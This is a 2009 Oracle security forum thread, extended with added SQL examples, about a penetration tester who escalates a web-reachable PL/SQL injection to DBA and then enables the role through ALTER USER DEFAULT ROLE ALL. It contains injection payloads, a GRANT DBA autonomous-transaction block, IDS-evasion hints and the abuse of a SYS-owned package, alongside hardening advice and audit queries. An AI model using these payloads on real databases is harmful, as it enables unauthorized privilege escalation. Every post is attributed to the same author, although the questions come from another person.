Title: penetration test
Post by Pete Finnigan on Dec 4th, 2009, 7:40pm

1. Apache + PHP + OCI8
2. 10gR2
3. Script with an SQL-injectable parameter
4. PL/SQL function with SQL injection :)

I have a DBA privilege escalation via an SQL injection in a local procedure created for an admin panel to show current sessions and jobs; I do not have access to the listener. I test it from the web, not from the user network. I create a function with a pragma and EXECUTE IMMEDIATE and transmit it as PL/SQL, but not all of it is executed, and simple DML/SQL like "select user from dual" too... I do not understand where to look for the problem. An IDS is used, but I evade it with chr() + base64 + cursor, and I grant myself DBA, but I can't perform a simple DML ;D Magic? Sorry for my bad English

Title: Re: penetration test
Post by Pete Finnigan on Dec 4th, 2009, 11:18pm

SELECT PRIVILEGE FROM SESSION_PRIVS

CREATE CLUSTER
CREATE INDEXTYPE
CREATE OPERATOR
CREATE PROCEDURE
CREATE SEQUENCE
CREATE SESSION
CREATE TABLE
CREATE TRIGGER
CREATE TYPE
UNLIMITED TABLESPACE

____________________________________________

SELECT GRANTED_ROLE FROM USER_ROLE_PRIVS

ADM_USER
CONNECT
DBA
RESOURCE

I try to select from dba_role_privs and I do not have the privileges... Maybe the default role is the problem?

Title: Re: penetration test
Post by Pete Finnigan on Dec 6th, 2009, 9:26am

Hi DSU, you didn't show the exploit sequence so it's hard to see, but the session privs you have look like CONNECT and RESOURCE. Did you log out and log back in to see if DBA is available? Try logging out; otherwise simply set the role DBA when you have logged in. It's granted to your user and should not be password protected, so try these two things. cheers Pete

Title: Re: penetration test
Post by Pete Finnigan on Dec 6th, 2009, 5:29pm

on 12/06/09 at 09:26:43, Pete Finnigan wrote:

Hi Pete. This is the problem: I do not have a connection to the listener; it's the PHP script that logs in and connects everything when it starts. I try EXECUTE IMMEDIATE ('declare pragma... execute immediate ''set role dba'' '). It does not work... Maybe the problem is that the created function is AUTHID, but in another schema?

Title: Re: penetration test
Post by Pete Finnigan on Dec 6th, 2009, 7:21pm

And I could show the public function and proc with the SQL injection, but it's private code, and posting it on a public forum... But the injection is at a point like this:

"... 'begin '||proc_name||'('||param1||','||param2||'...)"

Inject like this:

select mmm.sql_func(' sql_inject_proc(...); proc_name,param1,param2,param3...) from dual

The function returns a string: 'Y' if it is OK, 'N' when others.

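The injection sink DSU describes, a definer's-rights function that concatenates a procedure name and its parameters into an anonymous PL/SQL block and runs it, can be shown beside a hardened form. This is an added example, not the thread's private code; the names run_admin_proc_vuln, run_admin_proc_safe, show_sessions, show_jobs and app_user are hypothetical.

```sql
-- Added example (not the thread's code). All names are hypothetical.

-- VULNERABLE: the shape DSU describes. The procedure name and both
-- parameters are concatenated into PL/SQL source and executed with the
-- privileges of the function's owner (AUTHID DEFINER is the default).
-- A p_proc value such as
--   null; execute immediate 'declare pragma autonomous_transaction;
--   begin execute immediate ''grant dba to app_user''; end;'; show_sessions
-- turns the generated block into
--   begin null; execute immediate '...'; show_sessions('a', 'b'); end;
-- The inner autonomous block is what lets DDL run from a function that is
-- invoked inside a SELECT (ORA-14552 otherwise), which is the pragma DSU
-- refers to in the first post.
CREATE OR REPLACE FUNCTION run_admin_proc_vuln (
    p_proc   IN VARCHAR2,
    p_param1 IN VARCHAR2,
    p_param2 IN VARCHAR2
) RETURN VARCHAR2
IS
    v_sql VARCHAR2(4000);
BEGIN
    v_sql := 'begin ' || p_proc || '(''' || p_param1 || ''', '''
             || p_param2 || '''); end;';
    EXECUTE IMMEDIATE v_sql;
    RETURN 'Y';
EXCEPTION
    WHEN OTHERS THEN
        -- Also a yes/no oracle: the caller learns whether the injected
        -- statement parsed and ran, which is exactly what DSU used.
        RETURN 'N';
END;
/

-- HARDENED: fixed allow-list, name validated with DBMS_ASSERT (10gR2+),
-- parameters passed as bind variables so they can never become PL/SQL
-- source, and invoker's rights so the call runs with the web account's
-- privileges rather than the owner's.
CREATE OR REPLACE FUNCTION run_admin_proc_safe (
    p_proc   IN VARCHAR2,
    p_param1 IN VARCHAR2,
    p_param2 IN VARCHAR2
) RETURN VARCHAR2 AUTHID CURRENT_USER
IS
    v_proc VARCHAR2(128);
BEGIN
    v_proc := UPPER(TRIM(p_proc));
    IF v_proc NOT IN ('SHOW_SESSIONS', 'SHOW_JOBS') THEN
        RAISE_APPLICATION_ERROR(-20001, 'procedure not permitted');
    END IF;
    -- Belt and braces: rejects anything that is not a simple SQL name.
    v_proc := DBMS_ASSERT.SIMPLE_SQL_NAME(v_proc);
    EXECUTE IMMEDIATE 'begin ' || v_proc || '(:p1, :p2); end;'
        USING p_param1, p_param2;
    RETURN 'Y';
END;
/
```

The hardened version deliberately lets exceptions propagate instead of returning 'N': the blanket WHEN OTHERS in the original is what turned a failing injection into a reliable true/false signal. With AUTHID CURRENT_USER the roles of the calling account are honoured, so it must hold EXECUTE on the allow-listed procedures itself.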
Title: Re: penetration test
Post by Pete Finnigan on Dec 7th, 2009, 8:28am

Hi DSU, this sounds strange, that DBA is not available for your exploit user. It's unlikely that the DBA role is not a default role, as I have never seen a database like this in many, many years. It's possible, of course, just not likely. The first issue is the most likely: sometimes when an exploit grants DBA to the same user running the exploit, the DBA role is not available in the same session; you have to log out and log back in to see it. You showed that it was granted, so logging out will not ungrant it; if you log back in and it's still not enabled, then it must be the case that it's not a default role. cheers Pete

Title: Re: penetration test
Post by Pete Finnigan on Dec 7th, 2009, 8:36am

Hi Pete, thanks for the answer. It's a PHP CMS coded in 2003; it re-logs in every time it performs a search :) Yes, it's bad, but I did not write the scripts. I'll try to set the default role if I can... I found a vulnerable proc owned by SYS.

Title: Re: penetration test
Post by Pete Finnigan on Dec 7th, 2009, 8:46am

GRANTED_ROLE  DEFAULT_ROLE
------------  ------------
ADM_USER      YES
CONNECT       YES
DBA           NO

:(

Title: Re: penetration test
Post by Pete Finnigan on Dec 7th, 2009, 9:59am

OK, so that answers the issue; we now know it's because the DBA role is not a default role for the exploited user. If you cannot issue a SET ROLE, then simply re-run the exploit, except this time don't set the payload to "GRANT DBA TO {...}" and instead modify it to "ALTER USER {...} DEFAULT ROLE ALL". That way, when you log back in again, the DBA role will be enabled. Let us know if it works. cheers Pete

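The two-step Pete describes, as an added example rather than the thread's own payload. It assumes, as in the thread, that the payload executes in a context that already holds ALTER USER (here: the SYS-owned definer's-rights procedure DSU mentions); app_user is a hypothetical account name.

```sql
-- Added example (not the thread's code); APP_USER is hypothetical.
-- Assumes the DECLARE block below runs under a SYS-owned definer's-rights
-- procedure, i.e. with ALTER USER available, as in the thread.

-- What the exploited session sees after the first payload: DBA is granted
-- but is not a default role, so a fresh login does not enable it.
SELECT granted_role, default_role
  FROM user_role_privs
 ORDER BY granted_role;

-- Second payload, in the form that has to travel through the injection
-- point: DDL issued from a function that runs inside a SELECT must sit in
-- an autonomous transaction (ORA-14552 otherwise). Granting DBA alone
-- leaves the role inactive after re-login; DEFAULT ROLE ALL fixes that.
DECLARE
    PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO app_user';
    EXECUTE IMMEDIATE 'ALTER USER app_user DEFAULT ROLE ALL';
END;
/

-- Alternative when the same session can be kept: enable the role for this
-- session only. It does not help here because the PHP tier reconnects on
-- every request, which is why the DEFAULT ROLE change was needed instead.
SET ROLE DBA;

-- Confirm: DBA now shows DEFAULT_ROLE = YES, and after SET ROLE (or the
-- next login) its system privileges are live in SESSION_PRIVS.
SELECT granted_role, default_role FROM user_role_privs;
SELECT COUNT(*) AS live_sys_privs FROM session_privs;
```

SET ROLE is a session-level statement, which is why Pete's first suggestion (log out, log in, or SET ROLE DBA) could not work through a web tier that opens a fresh connection per request; the DEFAULT ROLE change is persistent in the data dictionary and survives the reconnect.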
Title: Re: penetration test
Post by Pete Finnigan on Dec 7th, 2009, 12:26pm

I know about ALTER USER and DEFAULT ROLE, but I do not know the result. This vulnerable proc works strangely: from it I execute a vulnerable function owned by SYS (the proc is also owned by SYS :) ), DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC, and nothing changed. I opened the Oracle documentation to search for the answer; an hour later, just out of interest, I selected from role_privs and...

GRANTED_ROLE  DEFAULT_ROLE
DBA           YES

I do not understand; maybe memcache is installed on the server and the role was set, but the web server gave a response from the cache... And Pete, is there a method to deny "alter user" with "default role" to everyone? I think this is a good step to secure an Oracle database... Thanks Pete

Title: Re: penetration test
Post by Pete Finnigan on Dec 7th, 2009, 12:44pm

Hi DSU, glad it works! The protection is to prevent a user from having the ALTER USER system privilege; without it he cannot set his own default roles or any other user's default roles. Oracle have silently allowed certain system privileges to work even if they are not granted, such as ALTER SESSION, where you can issue all commands except to set trace. With ALTER USER you can issue it to change your own password but not to set default roles:

SQL> connect system/xxxxxx@ora11
Connected.
SQL> create user rol identified by rol;

User created.

SQL> grant dba to rol;

Grant succeeded.

SQL> connect rol/rol@ora11
Connected.
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
ROL                            DBA                            NO  YES NO

SQL> connect system/xxxxx@ora11
Connected.
SQL> alter user rol default role none;

User altered.

SQL> connect rol/rol@ora11
ERROR:
ORA-01045: user ROL lacks CREATE SESSION privilege; logon denied

Warning: You are no longer connected to ORACLE.
SQL> connect system/xxxxx@ora11
Connected.
SQL> grant create session to rol;

Grant succeeded.

SQL> connect rol/rol@ora11
Connected.
SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
ROL                            DBA                            NO  NO  NO

SQL> alter user rol default role all;
alter user rol default role all
*
ERROR at line 1:
ORA-01031: insufficient privileges

SQL> alter user rol identified by rol;

User altered.

SQL>

So basically don't allow any user to have ALTER USER. cheers Pete

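A check for Pete's recommendation, added here and not part of the thread: list every account that ends up with ALTER USER, either by direct grant or through any chain of roles, plus the granted-but-not-default roles that put DSU's target one ALTER USER away from a live DBA. CONNECT_BY_ROOT needs 10g or later, which matches the 10gR2 target. Run as a DBA; no object names are assumed beyond the standard DBA_* views.

```sql
-- Added example (not the thread's code). Run as a DBA on 10g or later.

-- Every account that can issue ALTER USER ... DEFAULT ROLE, and how.
SELECT grantee AS holder, 'direct grant' AS via
  FROM dba_sys_privs
 WHERE privilege = 'ALTER USER'
   AND grantee IN (SELECT username FROM dba_users)
UNION
-- Through a role, however deeply nested
-- (e.g. APP_USER -> ADM_USER -> DBA -> ALTER USER).
SELECT r.holder, r.granted_role
  FROM (SELECT CONNECT_BY_ROOT grantee AS holder, granted_role
          FROM dba_role_privs
         START WITH grantee IN (SELECT username FROM dba_users)
       CONNECT BY PRIOR granted_role = grantee) r
  JOIN dba_sys_privs sp ON sp.grantee = r.granted_role
 WHERE sp.privilege = 'ALTER USER'
 ORDER BY 1, 2;

-- Roles granted but not enabled by default: exactly the state DSU hit.
-- Each of these is one ALTER USER ... DEFAULT ROLE away from being live,
-- so they deserve the same scrutiny as a default grant.
SELECT grantee, granted_role
  FROM dba_role_privs
 WHERE default_role = 'NO'
 ORDER BY 1, 2;
```

Anything in the first result set that is not a dedicated administrative account is a candidate for REVOKE; the second list shows where a non-default role is being relied on as a safeguard, which, as the thread demonstrates, holds only as long as nobody reachable from the web tier has ALTER USER.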
Title: Re: penetration test
Post by Pete Finnigan on Dec 7th, 2009, 2:15pm

I understand... but if I search and find an SQL injection on SYS or other users with DBA... I'll try to search in the *.sql scripts and *.ora files; maybe a method exists to completely disable ALTER USER "DEFAULT ROLE ...", or is this a core function of Oracle? Thanks for the answers :)